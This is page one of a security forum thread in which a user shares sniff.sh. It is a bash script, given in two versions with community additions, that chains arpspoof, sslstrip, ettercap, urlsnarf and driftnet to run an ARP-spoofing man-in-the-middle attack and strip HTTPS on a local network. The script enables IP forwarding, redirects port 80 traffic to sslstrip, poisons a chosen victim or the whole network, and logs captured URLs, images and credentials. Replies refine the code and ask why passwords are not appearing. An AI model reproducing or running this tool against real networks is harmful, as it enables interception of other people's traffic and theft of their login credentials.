Page 1 of 2 12 LastLast
Results 1 to 10 of 18

Thread: Tool I wrote sniff.sh

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    3

    Default Tool I wrote sniff.sh

    Hello,

    I wrote small script that uses sslstrip, arpspoof and ettercap for sniffing https ...
    I got tired of typing these 3 commands all the time


    Here is the script:

    Code:
    #!/bin/bash
    
    # Script for sniffing https connections.
    # Script uses Arpspoof, SSLStrip and Ettercap.
    # Tested on BT4 R2
    # BY gHero
    # Ver 0.1
    
    # ASCII sniff.sh
    echo '
                  .__  _____  _____           .__
      ______ ____ |__|/ ____\/ ____\     _____|  |__
     /  ___//    \|  \   __\\   __\     /  ___/  |  \
     \___ \|   |  \  ||  |   |  |       \___ \|   Y  \
    /____  >___|  /__||__|   |__|    /\/____  >___|  /
         \/     \/                   \/     \/     \/
    '
    
    echo '1' > /proc/sys/net/ipv4/ip_forward
    
    iptables --flush
    sleep 1
    
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    
    
    # Arpspoof
    echo
    echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
    echo '------------------------'
    echo -n -e '\E[37;41m'"Client IP address:"; tput sgr0
    read IP1
    echo -n -e '\E[30;47m'"Router's IP address:"; tput sgr0
    read IP2
    
    echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>:"; tput sgr0
    read INT
    xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &
    
    # SSLSTRIP
    xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &
    
    # ETTERCAP
    xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT'' &
    Version 0.2
    # CodeName = cseven

    Code:
    #!/bin/bash
    
    # Script for sniffing https connections.
    # Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
    # Tested on BT4 R2
    # BY gHero,cseven,spudgunman.
    # Ver 0.2
    
    # ASCII sniff.sh
    echo '
                  .__  _____  _____           .__
      ______ ____ |__|/ ____\/ ____\     _____|  |__
     /  ___//    \|  \   __\\   __\     /  ___/  |  \
     \___ \|   |  \  ||  |   |  |       \___ \|   Y  \
    /____  >___|  /__||__|   |__|    /\/____  >___|  /
         \/     \/                   \/     \/     \/
    '
    
    echo '1' > /proc/sys/net/ipv4/ip_forward
    
    iptables --flush
    sleep 1
    
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    
    
    # Arpspoof
    echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
    read ARPOP
    
    if [ "$ARPOP" == "T" ] ; then
    echo
    echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
    echo '------------------------'
    echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
    read IP1
    echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
    read IP2
    
    echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
    read INT
    xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &
    
    else
    
    echo
    echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
    echo '------------------------'
    echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
    read IP2
    
    echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
    read INT
    xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'' &
    
    fi
    
    # SSLSTRIP
    xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &
    
    # ETTERCAP
    xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT'' &
    
    # URLSNARF
    xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt' &
    
    # DRIFTNET
    driftnet -p -i $INT &
    Thanks Cseven and Spudgunman..

    And here is video of script:
    sniff.sh on Vimeo

  2. #2
    Member
    Join Date
    Feb 2009
    Location
    0,0
    Posts
    90

    Default Re: sniff.sh

    sometimes the simplest scripts are the best, anyone just learning can easily see what the commands are without having to dissect a more involved script.

    Here's a simple addition for URLSNARF

    Code:
    # URLSNARF
    xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt' &

  3. #3
    Junior Member
    Join Date
    Aug 2010
    Posts
    51

    Default Re: sniff.sh

    Awesome Ghero excellent work, I will test it out at home fully

    Im curious as to why you using xterm though? Sorry for my noobness Im trying my hand at sum scripting and its not simple at all :P

  4. #4
    Junior Member
    Join Date
    Mar 2010
    Posts
    43

    Default Re: sniff.sh

    VulcanX, this could be of use to you, found it when doing a little scriptting myself

    bash commands - Linux MAN Pages

  5. #5
    Member
    Join Date
    Dec 2007
    Location
    The Netherlands
    Posts
    267

    Default Re: sniff.sh

    Nice one. I'm still kind of a noob with bash scripting but this was pretty easy to follow.
    Student Systems Administration and Network Engineering, second year.
    Don't PM me with questions, unless very specific. Otherwise, use the forums so everyone can potentially benefit from it.

  6. #6
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: sniff.sh

    Moved to experts section, and changed title.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  7. #7
    Junior Member
    Join Date
    Aug 2010
    Posts
    64

    Default Re: Tool I wrote sniff.sh

    Did you see my tool? http://www.backtrack-linux.org/forum...4x0r-tool.html it has this incorporated into it basically.. you can always add to it, if you do let me know so I can get it added, I'll add your name into it aswell.

  8. #8
    Junior Member
    Join Date
    Jan 2010
    Posts
    55

    Default Re: Tool I wrote sniff.sh

    ascii art FTW. Now code it in python or perl

  9. #9
    Junior Member
    Join Date
    Aug 2010
    Posts
    51

    Default Re: Tool I wrote sniff.sh

    From previous MITM attacks I have done the username/password appeared on the screen. Here I cannot trace it?
    I even tried to check the ssl_log.txt and thats only the SSL certificate info. Am I missing something?

  10. #10
    Member
    Join Date
    Feb 2009
    Location
    0,0
    Posts
    90

    Default Re: Tool I wrote sniff.sh

    Added option to ARP a Target or Network:

    Replace #Arpsoof section with:

    Code:
    # Arpspoof
    echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
    read ARPOP
    
    if [ "$ARPOP" == "T" ] ; then
    echo
    echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
    echo '------------------------'
    echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
    read IP1
    echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
    read IP2
    
    echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
    read INT
    xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &
    
    else
    
    echo
    echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
    echo '------------------------'
    echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
    read IP2
    
    echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
    read INT
    xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'' &
    
    fi

Page 1 of 2 12 LastLast

Similar Threads

  1. sectool : Tool for Security Audit Tool and IDS
    By firebits in forum Tool Requests
    Replies: 3
    Last Post: 01-27-2011, 11:23 AM
  2. Two new tools I wrote
    By Twarter369 in forum Beginners Forum
    Replies: 3
    Last Post: 11-03-2010, 06:42 PM
  3. Doing a ssl sniff on a lan
    By Mutchako in forum Beginners Forum
    Replies: 2
    Last Post: 09-30-2010, 01:34 AM
  4. Tool request: NSAT (network security analysis tool)
    By williamc in forum OLD BT3beta General
    Replies: 10
    Last Post: 06-03-2008, 04:33 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •